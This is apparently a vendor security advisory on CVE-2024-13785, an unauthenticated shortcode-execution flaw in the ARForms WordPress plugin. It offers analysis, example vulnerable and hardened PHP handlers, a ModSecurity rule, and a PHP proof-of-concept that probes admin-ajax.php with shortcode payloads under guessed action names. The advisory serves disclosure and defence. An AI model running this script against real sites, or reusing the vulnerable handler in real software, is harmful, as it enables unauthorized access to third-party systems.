Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 23, 2026

CVE-2024-13785: Contact Form, Survey, Quiz & Popup Form Builder – ARForms <= 1.7.2 – Unauthenticated Blind Arbitrary Shortcode Execution (arforms-form-builder)

Severity Medium (CVSS 5.6)
CWE 94
Vulnerable Version 1.7.2
Patched Version
Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13785 (metadata-based):
This vulnerability in the ARForms plugin (versions <= 1.7.2) allows unauthenticated attackers to execute arbitrary WordPress shortcodes. Based on the advisory wording and the CWE classification rather than on a code diff, the flaw most likely resides in an AJAX or form handler that passes unsanitized user input directly to the `do_shortcode()` function. The issue is classified as blind, meaning the rendered output is not expected to be returned to the attacker, so exploitation relies on the side effects of whatever shortcodes the target site has registered. The CVSS score of 5.6 (Medium) reflects an attack of high complexity with low impact on each of confidentiality, integrity, and availability.

Atomic Edge research identifies the root cause as CWE-94, Improper Control of Generation of Code. The vulnerability description confirms that the software lets users execute an action that does not properly validate a value before running `do_shortcode`. This is a classic code injection flaw: user-supplied data is interpreted as shortcode, and each shortcode tag resolves to a PHP callback registered on the site. Without a code diff, this conclusion is inferred from the CWE classification and the explicit mention of `do_shortcode` in the description. The absence of both an authentication check and input validation is a direct failure of the plugin's security controls.

Exploitation most likely occurs via a WordPress AJAX endpoint reachable by unauthenticated users; the standard pattern is a `wp_ajax_nopriv_{action}` hook. The action and parameter names that follow are inferred from common plugin conventions, not taken from the plugin's source. An attacker would send a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter such as `arforms_{specific_action}` and a second parameter, perhaps named `shortcode` or `content`, carrying the shortcode payload. For example, a payload such as `[shortcode arg="malicious_value"]` would invoke another plugin's shortcode handler with attacker-chosen attributes. Because `do_shortcode()` resolves tags against every shortcode registered on the site, the reachable functionality is the union of all shortcodes provided by core, the active theme, and every installed plugin, potentially leading to data exposure or further exploitation.

Effective remediation requires that user input never reach `do_shortcode()` unvalidated. The safest fix is to accept only an identifier (for example a form ID), validate it, and construct the single shortcode the endpoint is meant to render on the server side; where free text genuinely must be accepted, the plugin should enforce a strict allowlist of permitted shortcode tags and strip everything else. The fix must also add a nonce check and a capability check so that only authorized users can trigger the action. In practice, patching this vulnerability means modifying the callback for the implicated AJAX hook to include these measures and, unless anonymous access is a hard requirement, dropping the `wp_ajax_nopriv_` registration.
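The following is an added illustration and is not ARForms' code: a typical unauthenticated AJAX handler that hands user text to `do_shortcode()`, followed by the hardened replacement described above. The hook names (`example_render`, `example_render_fixed`), the parameter names and the `[example_form]` shortcode are hypothetical; the WordPress functions used (`check_ajax_referer`, `current_user_can`, `absint`, `get_shortcode_regex`, `wp_send_json_*`) are real core APIs.

```php
<?php
// Added illustration, not ARForms' code. Hook names, parameter names and the
// [example_form] shortcode are hypothetical; the WordPress API calls are real.

// --- Vulnerable pattern ---------------------------------------------------
// Registered for anonymous visitors (wp_ajax_nopriv_) with no nonce or
// capability check. Every shortcode registered on the site becomes callable
// by anyone who can reach admin-ajax.php.
add_action( 'wp_ajax_nopriv_example_render', 'example_render_vulnerable' );
add_action( 'wp_ajax_example_render', 'example_render_vulnerable' );
function example_render_vulnerable() {
    $content = wp_unslash( $_POST['content'] ?? '' );
    echo do_shortcode( $content ); // attacker controls which [tags] run
    wp_die();
}

// --- Hardened pattern -----------------------------------------------------
// No wp_ajax_nopriv_ registration: anonymous visitors cannot reach it at all.
add_action( 'wp_ajax_example_render_fixed', 'example_render_fixed' );
function example_render_fixed() {
    // 1. A nonce bound to this action blocks CSRF; a capability check blocks
    //    low-privilege accounts. Both calls terminate the request on failure.
    check_ajax_referer( 'example_render', 'nonce' );
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. Do not accept shortcode text. Accept an identifier, validate it, and
    //    build the one shortcode this endpoint exists to render.
    $form_id = absint( $_POST['form_id'] ?? 0 );
    if ( 0 === $form_id ) {
        wp_send_json_error( 'invalid form id', 400 );
    }
    wp_send_json_success( do_shortcode( sprintf( '[example_form id="%d"]', $form_id ) ) );
}

// --- Allowlist filter for the rare case where free text must be rendered ---
// Removes every shortcode tag that is not explicitly permitted before the text
// reaches do_shortcode(). get_shortcode_regex() with no argument matches all
// registered tags; capture group 2 of that regex is the tag name.
function example_filter_shortcodes( string $content, array $allowed_tags ): string {
    $pattern = '/' . get_shortcode_regex() . '/s';
    return preg_replace_callback(
        $pattern,
        static function ( array $m ) use ( $allowed_tags ): string {
            return in_array( $m[2], $allowed_tags, true ) ? $m[0] : '';
        },
        $content
    );
}
// Usage inside a handler that has already passed the nonce/capability checks:
//   echo do_shortcode( example_filter_shortcodes( $content, array( 'example_form' ) ) );
```

The identifier-based handler is the fix to prefer: it removes the attacker's influence over which callback runs rather than trying to enumerate bad tags. If the allowlist filter is used, note that an allowed enclosing shortcode whose callback calls `do_shortcode()` on its inner content will still process nested tags; either apply the filter recursively to the captured content (group 5 of the same regex) or keep enclosing shortcodes off the allowlist.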

Successful exploitation allows arbitrary shortcode execution. Shortcodes are not PHP code themselves, but each tag maps to a PHP callback, so the attacker's reach is the set of callbacks registered by core, the active theme, and every installed plugin. Depending on what is present, those callbacks could read sensitive data, create users, or trigger other side effects; output-based effects such as reflected cross-site scripting additionally require the handler to echo the rendered result, which the blind classification suggests it does not. The impact is therefore bounded by the shortcodes available on the target site, but on a site with many plugins this can escalate to privilege escalation, data leakage, or full site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2024-13785 (metadata-based)
# Blocks requests to the WordPress AJAX handler whose action parameter carries the
# ARForms plugin prefix and whose likely payload parameter contains a shortcode tag.
# The action and parameter names are inferred, not confirmed from the plugin source,
# so legitimate ARForms submissions that contain square brackets may match; tune the
# rule in DetectionOnly mode on a staging copy of the site before enabling blocking.
# REQUEST_FILENAME is used instead of REQUEST_URI so a query string on the request
# does not defeat the match, and ARGS:action covers the action arriving in either
# the query string or the POST body.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:202413785,phase:2,deny,status:403,log,chain,msg:'CVE-2024-13785: ARForms Unauthenticated Shortcode Execution Attempt',severity:'CRITICAL',tag:'CVE-2024-13785',tag:'WordPress',tag:'Plugin',tag:'ARForms'"
  SecRule ARGS:action "@rx ^arforms_" "t:none,t:lowercase,chain"
    SecRule ARGS_POST:/^(shortcode|content|value|data)$/ "@rx \[[a-z0-9_-]+[^\]]*\]" "t:none,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13785 - Contact Form, Survey, Quiz & Popup Form Builder – ARForms <= 1.7.2 - Unauthenticated Blind Arbitrary Shortcode Execution
/**
 * Proof of Concept for CVE-2024-13785.
 * This script attempts to exploit the unauthenticated shortcode execution vulnerability.
 * The exact AJAX action and parameter names are inferred from common plugin patterns,
 * not taken from the plugin's source, so the action list and parameter names below are guesses.
 * Assumptions:
 *   1. The vulnerable endpoint is /wp-admin/admin-ajax.php.
 *   2. The action hook is related to the plugin slug 'arforms'.
 *   3. A user-controlled parameter is passed to do_shortcode().
 * Because the issue is classified as Blind, the rendered output is not expected to come
 * back in the HTTP response. The response check below is therefore only a heuristic, and
 * a negative result does not show that the target is unaffected.
 */

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Common inferred action names for the ARForms plugin (guesses, see above).
$possible_actions = [
    'arforms_execute_shortcode',
    'arforms_ajax_action',
    'arforms_process_form',
    'arforms_preview',
];

// Shortcode payload. NOTE: WordPress core does not register a [bloginfo] shortcode,
// so this placeholder only produces output if a plugin on the target defines it.
// Replace it with a low-impact shortcode that is known to be registered on the
// authorized test site. The expected output, if any is reflected, is the site title.
$shortcode_payload = '[bloginfo key="name"]';
// Site title of the test installation, used only for the reflected-output heuristic.
$expected_title = 'Example';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $target_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST           => true,
    CURLOPT_TIMEOUT        => 15,
    // No CURLOPT_FOLLOWLOCATION: libcurl turns a POST into a GET on a 301/302
    // redirect, which would silently drop the payload. Point $target_url at
    // the final scheme/host instead.
]);

foreach ($possible_actions as $action) {
    // Send the payload under every parameter name that might be handed to do_shortcode().
    $post_fields = [
        'action'    => $action,
        'shortcode' => $shortcode_payload,
        'content'   => $shortcode_payload,
        'value'     => $shortcode_payload,
        'data'      => $shortcode_payload,
    ];

    // http_build_query() sends application/x-www-form-urlencoded, which every
    // admin-ajax handler accepts; passing the array directly would send multipart.
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));

    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if ($response === false) {
        echo "[-] Request failed for action {$action}: " . curl_error($ch) . "\n";
        continue;
    }

    // admin-ajax.php answers an action that has no nopriv hook with the body "0"
    // and HTTP 400, so a 200 with any other body means the action exists and ran.
    if ($http_code == 200 && $response !== '' && $response !== '0') {
        echo "[+] Potential success with action: {$action}\n";
        echo "    HTTP Code: {$http_code}\n";
        echo "    Response (first 500 chars): " . substr($response, 0, 500) . "\n\n";
        // Reflected site title would indicate the shortcode ran, but this is a
        // blind issue: absence of the title is not evidence that it did not run.
        if ($expected_title !== '' && stripos($response, $expected_title) !== false) {
            echo "[!] Site title found in response: shortcode execution likely.\n";
        }
    } else {
        echo "[-] No success with action: {$action} (HTTP {$http_code})\n";
    }
}

curl_close($ch);
